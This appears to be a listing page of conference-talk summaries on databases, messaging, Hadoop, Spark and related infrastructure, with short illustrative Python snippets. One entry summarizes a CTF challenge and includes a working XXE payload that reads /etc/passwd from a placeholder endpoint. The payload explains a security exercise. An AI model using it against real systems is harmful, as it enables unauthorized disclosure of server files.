This document summarizes MongoDB usage at MapMyFitness from a DevOps perspective. It describes how MongoDB is used for storing routes, sessions, live tracking data, and API logs. It provides examples of implementation patterns like replica sets, sharding, and automated provisioning. It also covers monitoring, security, maintenance, and lessons learned.
With the widespread adoption of Git, and the rollout of Git-based development workflows, large organizations must be able to scale their source code management system with their needs. In this talk we will provide practical advice to overcome the challenges in scaling Git.
This document summarizes a three-part challenge involving cracking a MIPS binary, exploiting a Python/XXE vulnerability in a web application, and decrypting messages from a SecureDrop-like system. The MIPS binary is cracked by inverting its password checking algorithm. The web app is exploited via XXE to retrieve files containing an admin URL and view state details. Python code is modified at runtime to decrypt an AES key and access a "secret.key" file. This key reveals a tarball containing a SecureDrop implementation. A buffer overflow in SecDrop's service is used to run shellcode. Timing attacks via the CPU cache are then used to retrieve the private RSA key and decrypt messages stored by the SecureDrop-like system.
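For context, the XXE step relies on a classic external-entity payload. Below is a minimal probe sketched in Python; the target URL is a hypothetical placeholder, not the challenge's actual endpoint:

```python
# Minimal XXE probe, assuming a hypothetical endpoint that parses
# attacker-supplied XML with external entity resolution enabled.
import requests

XXE_PAYLOAD = """<?xml version="1.0"?>
<!DOCTYPE data [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<data>&xxe;</data>"""

resp = requests.post(
    "http://target.example/api/import",  # placeholder vulnerable endpoint
    data=XXE_PAYLOAD,
    headers={"Content-Type": "application/xml"},
)
print(resp.text)  # if vulnerable, the file contents are echoed back
```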
Monitoring your technology stack with New Relic, by Ronald Bradford
There is no excuse not to monitor your LAMP stack, NoSQL databases like MongoDB/Redis/Cassandra/Memcache, cloud services, and much more when you can use the popular New Relic tool for free. As the MySQL plugin author, I can offer the following link, which will give you access to free monitoring: http://j.mp/newrelic-mysql. There can never be an excuse not to know how your application is performing, from 1 server to 100+ servers.
Imola Informatica - cloud computing and software development, by Filippo Bosi
This document provides an agenda and overview of a cloud computing workshop held in September 2011. The agenda includes an overview of cloud computing, its impacts on software development, and a hands-on demonstration of Platform as a Service (PaaS). Key concepts discussed include Infrastructure as a Service (IaaS) using Amazon EC2, PaaS options like Google App Engine, CloudBees, and RedHat OpenShift. Developing applications on IaaS provides more control but requires managing infrastructure, while PaaS hides these details and allows focusing on development.
MongoDB at MapMyFitness from a DevOps Perspective, by MongoDB
This document provides an overview of how MongoDB is used at MapMyFitness (MMF) from a DevOps perspective. It describes how MMF stores the majority of its data, including over 120 million user-generated routes and activities totaling over 7TB, in various MongoDB collections. It also discusses MMF's implementation patterns for MongoDB, including replica sets, sharding, and automation. The document outlines considerations for monitoring, maintenance, security, and performance tuning of MongoDB at scale.
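As an illustration of the replica-set pattern the deck describes, here is a minimal pymongo connection sketch; the host names, replica set name, database, and collection are invented for the example:

```python
# A minimal sketch of connecting to a replica set with pymongo.
# All names below are illustrative assumptions, not MMF's topology.
from pymongo import MongoClient

client = MongoClient(
    "mongodb://db1.example:27017,db2.example:27017,db3.example:27017",
    replicaSet="mmf0",                    # hypothetical replica set name
    readPreference="secondaryPreferred",  # offload reads from the primary
)
routes = client.workouts.routes           # hypothetical db/collection
print(routes.estimated_document_count())
```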
Context-Aware Access Control for RDF Graph Stores, by Serena Villata
This document describes SHI3LD, a context-aware access control system for RDF graph stores. SHI3LD uses semantic web technologies and vocabularies to define access policies and user contexts. It evaluates policies against user contexts to determine which named graphs the user can access. This allows fine-grained, context-sensitive access control over RDF data. The system was evaluated using a SPARQL benchmark dataset, and response times increased only slightly as more user contexts and consumers were added. Future work may focus on improving context data trustworthiness and performing user-centered evaluations.
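To make the policy-evaluation idea concrete, here is a toy sketch with rdflib: an access policy expressed as a SPARQL ASK query is checked against a user's context graph. The vocabulary and data are invented for illustration; SHI3LD uses its own policy vocabulary:

```python
# Toy version of context-aware policy evaluation: grant access to a
# named graph only if the ASK policy holds in the user's context graph.
from rdflib import Graph

context = Graph()
context.parse(data="""
@prefix ex: <http://example.org/> .
ex:alice a ex:Employee ; ex:location ex:Office .
""", format="turtle")

policy = """
PREFIX ex: <http://example.org/>
ASK { ?user a ex:Employee ; ex:location ex:Office . }
"""

granted = context.query(policy).askAnswer
print("access granted" if granted else "access denied")
```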
IETF 90 Report – DNS, DHCP, IPv6 and DANE, by Men and Mice
At this webinar, Mr. Carsten Strotmann from the Men & Mice Services team gives an overview of interesting developments from the working groups inside the IETF, after attending IETF 90 in Toronto online.
Hear more on:
- DNS
- DNS-Privacy
- IPv6
- DANE
- DHCP(v6)
- and new RFCs that have been published since the last IETF in March 2014
This document discusses AMQP and RabbitMQ for messaging. AMQP is a networking protocol that enables client applications to communicate with messaging middleware brokers. Brokers receive messages from publishers and route them to consumers. RabbitMQ is an open source message broker that implements AMQP. It discusses using RabbitMQ with various languages like Ruby via libraries like Bunny. It provides examples of broker types, exchanges and queues.
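The talk's examples use Ruby's Bunny; an equivalent minimal publish/consume sketch in Python with pika, against a local RabbitMQ, looks like this:

```python
# Declare an exchange, bind a queue, publish, and fetch one message.
# Exchange, queue, and routing-key names are illustrative.
import pika

conn = pika.BlockingConnection(pika.ConnectionParameters("localhost"))
ch = conn.channel()

# A direct exchange routes on an exact routing-key match.
ch.exchange_declare(exchange="events", exchange_type="direct")
ch.queue_declare(queue="audit")
ch.queue_bind(queue="audit", exchange="events", routing_key="user.created")

# The broker routes the message to every queue bound with this key.
ch.basic_publish(exchange="events", routing_key="user.created",
                 body=b"user 42 created")

# Pull one message off the queue.
method, props, body = ch.basic_get(queue="audit", auto_ack=True)
print(body)
conn.close()
```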
As one of our primary data stores, we utilize MongoDB heavily. Early last year our DevOps lead, Chris Merz, submitted some of our use cases to 10gen (http://www.10gen.com/events) as fodder for a presentation at the MongoDB conference in Boulder. The presentation went well enough at the Boulder conference that 10gen asked him to give it again in San Francisco, Seattle, and once more in Boulder.
Hopefully there are some nuggets in this deck that can help you in your quest to dominate MongoDB.
In this presentation, I illustrate, and discuss initial results from a quantitative analysis of the performance of WPS servers. To do so, two test scenarios were used to measure response time, response size, throughput, and failure rate of five WPS servers including 52North, Deegree, GeoServer, PyWPS, and Zoo. I also assess each WPS server in terms of qualitative metrics such as software architecture, perceived ease of use, flexibility of deployment, and quality of documentation. A case study addressing accessibility assessment is used to evaluate the relative advantages and disadvantages of each implementation, and point to challenges experienced while working with these WPS servers.
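The response-time measurements can be approximated with a few lines of Python; the endpoint below is a placeholder rather than one of the five tested servers:

```python
# Rough sketch of the benchmark's core measurement: time a WPS
# GetCapabilities request and record status and payload size.
import time
import requests

endpoint = "http://wps.example.org/wps"  # placeholder WPS endpoint
params = {"service": "WPS", "request": "GetCapabilities", "version": "1.0.0"}

start = time.perf_counter()
resp = requests.get(endpoint, params=params, timeout=30)
elapsed = time.perf_counter() - start

print(f"status={resp.status_code} "
      f"time={elapsed:.3f}s size={len(resp.content)} bytes")
```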
This document discusses workflows in astronomy and the Virtual Observatory (VO). It defines workflows as combinations of data and processes into structured steps that implement computational solutions. It describes different types of workflows used in astronomy, such as personal scripts, multi-archive recipes, and processing pipelines. The document then summarizes several tools used to create workflows, including Taverna, Kepler, Triana, ESO Reflex, AstroTaverna, and the Aladin JLOW plugin. It also discusses related initiatives involving workflows, such as Wf4Ever, Cyber-SKA, Montage, and Astro-WISE. Finally, it outlines how workflows and web services could be important for the next generation of astronomical archives and data analysis in the VO.
Overview of myHadoop 0.30, a framework for deploying Hadoop on existing high-performance computing infrastructure. Discussion of how to install it, spin up a Hadoop cluster, and use the new features.
myHadoop 0.30's project page is now on GitHub (https://github.com/glennklockwood/myhadoop) and the latest release tarball can be downloaded from my website (glennklockwood.com/files/myhadoop-0.30.tar.gz)
Spark Summit EU talk by Debasish Das and Pramod Narasimha, Spark Summit
This document describes a system called DeviceAnalyzer that builds predictive models in near-real time using Apache Spark and Apache Lucene. It discusses:
1) Integrating Spark and Lucene to enable column search capabilities in Spark and add Spark operations to Lucene.
2) Representing Spark DataFrames as Lucene documents to build a distributed Lucene index from DataFrames.
3) Using the index for tasks like searching devices matching a query, generating statistical and predictive models on retrieved devices, and finding dimensions correlated with selected devices.
4) Architectural components like Trapezium for batch, streaming, and API services, and a LuceneDAO for indexing DataFrames and querying the index (a rough sketch of the search-then-model workflow follows).
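Trapezium and LuceneDAO are the talk's own components, so as a rough stand-in the following PySpark sketch shows only the shape of the workflow: select the devices matching a query, then fit a model on the retrieved rows. All data and column names are invented:

```python
# Search-then-model sketch: in the real system the "search" step is a
# Lucene query over a distributed index; here it is a plain filter.
from pyspark.sql import SparkSession
from pyspark.ml.feature import VectorAssembler
from pyspark.ml.clustering import KMeans

spark = SparkSession.builder.appName("device-analyzer-sketch").getOrCreate()

devices = spark.createDataFrame(
    [("d1", "android", 3.1, 0.4), ("d2", "ios", 1.2, 0.9),
     ("d3", "android", 2.7, 0.5)],
    ["id", "platform", "hours", "churn_score"],
)

# "Search": retrieve the devices matching a query.
matched = devices.filter(devices.platform == "android")

# Model: fit on the retrieved device profiles.
features = VectorAssembler(inputCols=["hours", "churn_score"],
                           outputCol="features").transform(matched)
model = KMeans(k=2, seed=1).fit(features)
print(model.clusterCenters())
```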
Spark Summit EU talk by Debasish Das and Pramod Narasimha, Spark Summit
This document describes a system called DeviceAnalyzer that uses Apache Spark and Apache Lucene to build predictive models in near-real time from streaming and batch data. It discusses:
1) Integrating Spark and Lucene to index streaming and batch data for fast search and retrieval, enabling statistical and predictive modeling on the retrieved data.
2) A batch workflow that indexes batch data using Lucene, and a streaming workflow that processes streaming queries and compares or augments results.
3) Statistical and machine learning operators like summation, L1/L2 regularization, and sparse linear algebra for building models on retrieved device profiles.
An Empirical Study on the Risks of Using Off-the-Shelf Techniques for Process..., by Nicolas Bettenburg
The document discusses challenges in using off-the-shelf techniques to analyze mailing list archives. It finds that up to 98% of messages contain noise and need additional processing and cleaning. Issues include resolving multiple sender identities in up to 21% of addresses, reconstructing discussion threads from the linear archives, and extracting attachments that make up around 10% of messages.
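Thread reconstruction, one of the issues named above, can be sketched in a few lines of Python using the standard mailbox module and the In-Reply-To header; the archive path is a placeholder:

```python
# Rebuild discussion threads from a linear mbox archive by linking
# each reply to its parent via the In-Reply-To header.
import mailbox
from collections import defaultdict

mbox = mailbox.mbox("archive.mbox")  # placeholder path

by_id = {}
children = defaultdict(list)
for msg in mbox:
    msg_id = msg.get("Message-ID")
    if msg_id:
        by_id[msg_id] = msg

for msg_id, msg in by_id.items():
    parent = msg.get("In-Reply-To")
    if parent in by_id:
        children[parent].append(msg_id)

# Roots are messages that reply to nothing present in the archive.
roots = [m for m in by_id if by_id[m].get("In-Reply-To") not in by_id]
print(f"{len(roots)} threads reconstructed from {len(by_id)} messages")
```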
From a student to an Apache committer: practice of Apache IoTDB, by jixuan1989
This talk was given by Xiangdong Huang, a PPMC member of the Apache IoTDB (incubating) project, at the Apache Event at Tsinghua University in China.
About the Event:
The open source ecosystem plays an increasingly important role in the world. Open source software is widely used in operating systems, cloud computing, big data, artificial intelligence, and the industrial Internet. Many companies have gradually increased their participation in the open source community. Developers with open source experience are increasingly valued and favored by large enterprises. The Apache Software Foundation is one of the most important open source communities, contributing a large number of valuable open source projects and communities to the world.
The invited guests of this lecture are all from the ASF community, including the chairman of the Apache Software Foundation, three Apache members, top-5 Apache code committers (according to the Apache annual report), the first committer on the Hadoop project in China, several Apache project mentors or VPs, and many Apache committers. They will tell you what the open source culture is, how to join the Apache open source community, and the Apache Way.
NGS Informatics and Interpretation - Hardware Considerations by Michael McManus, Knome_Inc
View this webinar at: http://www.knome.com/webinar-ngs-informatics-and-interpretation-hardware-considerations. In this presentation, Knome’s Senior Vice President of Operations, Michael McManus, PhD, will review the k100 and k25 hardware models of the knoSYS including servers, storage, networks, and power components. While doing so, he will answer:
- Why would someone purchase hardware when they can process NGS data on the cloud?
- For an organization not interested in using the cloud, what sort of hardware should be considered?
- What hardware specifications are needed for conducting align + call (FASTQ and/or BAM files) versus interpretation (VCF files)?
- Is all hardware alike? How does someone compare systems apples-to-apples?
This document introduces Hadoop, an open-source framework for distributed storage and processing of large datasets across clusters of computers. It discusses how Hadoop uses HDFS for scalable storage and MapReduce for distributed processing. Key components are introduced, including how HDFS stores data in replicated blocks and how MapReduce executes jobs by splitting data, mapping tasks, shuffling, and reducing results. A word count example demonstrates the MapReduce process.
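The word count example typically looks like the following pair of Hadoop Streaming scripts, shown here in one file for brevity; this is the canonical pattern rather than code from the document itself:

```python
# wordcount for Hadoop Streaming: the mapper emits (word, 1) pairs,
# the shuffle sorts them by key, and the reducer sums contiguous runs.
import sys

def mapper():
    for line in sys.stdin:
        for word in line.split():
            print(f"{word}\t1")

def reducer():
    # Input arrives sorted by key, so counts for a word are contiguous.
    current, count = None, 0
    for line in sys.stdin:
        word, n = line.rsplit("\t", 1)
        if word != current:
            if current is not None:
                print(f"{current}\t{count}")
            current, count = word, 0
        count += int(n)
    if current is not None:
        print(f"{current}\t{count}")

if __name__ == "__main__":
    # Select the role: wordcount.py map | wordcount.py reduce
    mapper() if sys.argv[1] == "map" else reducer()
```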
This document discusses embracing HTTP and changing approaches to web application development. It suggests flipping dependencies so that applications are built around HTTP rather than frameworks. It also recommends taking a more stateful approach by going CQRS/ES rather than relying on CRUD and resources. The document questions common patterns and promotes thinking beyond frameworks to more fundamental concepts.
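A toy Python sketch of the event-sourced alternative to CRUD that the document alludes to: state is never updated in place but rebuilt by folding events. All names are illustrative:

```python
# Event sourcing in miniature: an append-only event log plus a pure
# fold that derives the current state from the events.
from dataclasses import dataclass

@dataclass(frozen=True)
class ItemAdded:
    sku: str
    qty: int

@dataclass(frozen=True)
class ItemRemoved:
    sku: str
    qty: int

def apply(state: dict, event) -> dict:
    state = dict(state)  # never mutate: derive a new state
    if isinstance(event, ItemAdded):
        state[event.sku] = state.get(event.sku, 0) + event.qty
    elif isinstance(event, ItemRemoved):
        state[event.sku] = state.get(event.sku, 0) - event.qty
    return state

events = [ItemAdded("sku-1", 3), ItemRemoved("sku-1", 1)]
state = {}
for e in events:
    state = apply(state, e)
print(state)  # {'sku-1': 2}
```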
This document discusses MongoDB and server performance. It covers tools for profiling and monitoring MongoDB performance like db.currentOp() and mongostat. It discusses optimizing queries and schemas for speed. It also covers server resources like storage, network, and CPU. Specifically, it goes into details about storage types like RAM, SSD, HDD and how the page cache and memory mapped files work. It provides tips on identifying and troubleshooting disk and memory limits that could impact performance.
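The shell tools the deck covers (db.currentOp(), the profiler) have direct equivalents in pymongo. A minimal sketch, assuming a modern mongod where currentOp is available as a command:

```python
# Inspect in-flight operations and enable the slow-query profiler.
from pymongo import MongoClient

client = MongoClient("mongodb://localhost:27017")
db = client.test  # illustrative database name

# Rough equivalent of db.currentOp() in the mongo shell.
ops = client.admin.command("currentOp")
for op in ops.get("inprog", []):
    print(op.get("opid"), op.get("op"), op.get("ns"))

# Profile level 1: log operations slower than 100 ms to system.profile.
db.command("profile", 1, slowms=100)
for entry in db.system.profile.find().sort("ts", -1).limit(5):
    print(entry.get("ns"), entry.get("millis"))
```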
Two popular tools for doing machine learning on top of the JVM ecosystem are H2O and SparkML. This presentation compares the two as machine learning libraries (it does not consider Spark's data-munging capabilities). This work was done during June of 2018.
Description of some of the elements that go into creating a PostgreSQL-as-a-Service offering for organizations with many teams and a diverse ecosystem of applications.
The document discusses the development of a high-traffic website for Kinepolis, a Belgian cinema chain, using the Drupal content management system. Key aspects covered include the multilingual and multisite architecture built on a single Drupal codebase, integration with third-party systems, a content model using core Drupal components, performance optimization techniques including caching and search implementation with Apache Solr, and the use of responsive design to create a future-proof website accessible on different devices.
Scripting and automation with the Men & Mice Suite, by Men and Mice
The powerful SOAP interface & how and where scripts can be integrated
Besides the Men & Mice Management Console, the Web Interface, and the command line interface (CLI), there are other ways to access the Men & Mice Suite.
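One such way is the SOAP interface, which can be scripted from Python with a generic client such as zeep. The WSDL URL and the operation name below are placeholders, not the product's actual API:

```python
# Generic SOAP scripting sketch with zeep; introspect the service
# description first, then call operations against it.
from zeep import Client

client = Client("http://mmsuite.example/wsdl")  # placeholder WSDL location

# List the services the WSDL exposes before scripting against them.
for service in client.wsdl.services.values():
    print(service.name)

# A call would then look like this (hypothetical operation name):
# result = client.service.GetDNSZones(session="...")
```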